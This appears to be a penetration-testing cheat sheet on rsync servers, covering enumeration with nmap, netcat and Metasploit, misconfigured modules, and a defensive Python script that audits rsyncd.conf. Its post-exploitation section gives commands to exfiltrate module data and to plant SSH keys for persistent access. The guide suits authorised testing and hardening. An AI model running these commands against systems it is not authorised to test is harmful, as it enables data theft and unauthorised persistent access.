Rsync

Default Port: 873

Connect

To initiate a connection with an rsync server, use the rsync command followed by the rsync URL.

The URL format is `[rsync://][user@]host[:port]/module`.

rsync rsync://user@target_host/

Enumeration

Identifying an Rsync Server

You can use Nmap to check if there's an Rsync server on a target host like this:

nmap -p 873 X.X.X.X

You can use Netcat to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.

nc -nv X.X.X.X 873

# Expected output format
@RSYNCD: version

Enumerate Modules

Enumeration is crucial in understanding the structure of the target rsync module and finding misconfigurations or sensitive information.

Using nmap

nmap -sV --script "rsync-list-modules" -p 873 target_host

Using Metasploit

msf> use auxiliary/scanner/rsync/modules_list

Enumerate Shared Folders

Rsync modules represent directory shares and may be protected with a password. To list these modules:

rsync target_host::

For detailed enumeration of a specific module to see files and permissions:

rsync -av --list-only rsync://target_host/module_name

Attack Vectors

Misconfigured Modules

Modules without proper authentication can be accessed by unauthorized users. This misconfiguration allows attackers to read, modify, or delete sensitive data.

If a module is writable, and you have determined its path through enumeration, you can upload malicious files, potentially leading to remote command execution or pivoting into the network.
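On the server side, the same misconfigurations can be found by auditing `rsyncd.conf` directly. The following is an added example, not part of the original page: a small parser that flags modules with no `auth users`, with `read only` disabled, or with no `hosts allow` restriction. The sample configuration, module names and paths are constructed for illustration, and line continuations and include directives are not handled.

```python
import re

# Constructed sample rsyncd.conf (module names and paths are hypothetical).
SAMPLE_CONF = """\
uid = nobody
read only = yes
[public]
path = /srv/public
[backups]
path = /srv/backups
read only = no
[home_user]
path = /home/home_user
Read Only = false
auth users = backup
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/24
"""

def parse_rsyncd_conf(text):
    """Return {module: params}. Globals set before the first module are defaults."""
    defaults, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = modules.setdefault(section.group(1).strip(), dict(defaults))
        elif "=" in line:
            key, value = line.split("=", 1)  # only the first '=' is significant
            key = "".join(key.lower().split())  # whitespace in names is irrelevant
            (defaults if current is None else current)[key] = value.strip()
    return modules

def audit(text):
    """Map each risky module to the list of issues found in its settings."""
    findings = {}
    for name, params in parse_rsyncd_conf(text).items():
        issues = []
        if not params.get("authusers"):
            issues.append("anonymous access (no auth users)")
        if params.get("readonly", "yes").lower() in {"no", "false", "0"}:
            issues.append("writable (read only disabled)")
        if not params.get("hostsallow"):
            issues.append("no hosts allow restriction")
        if issues:
            findings[name] = issues
    return findings
```

Calling `audit()` on the contents of `/etc/rsyncd.conf` returns a dictionary keyed by module name; an empty result means none of the three checks fired.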

Outdated Rsync Version

Old versions of rsync may contain vulnerabilities that can be exploited. Use tools like nmap with version detection to identify if the target is running an outdated rsync version.

nmap -sV --script=rsync-list-modules target_host

Post-Exploitation

Data Exfiltration

Sensitive data identified during enumeration can be exfiltrated using rsync:

rsync -avz target_host::module_name /local/directory/

Gain Persistent Access

Upload artifacts like modified scripts or binaries to maintain access:

rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh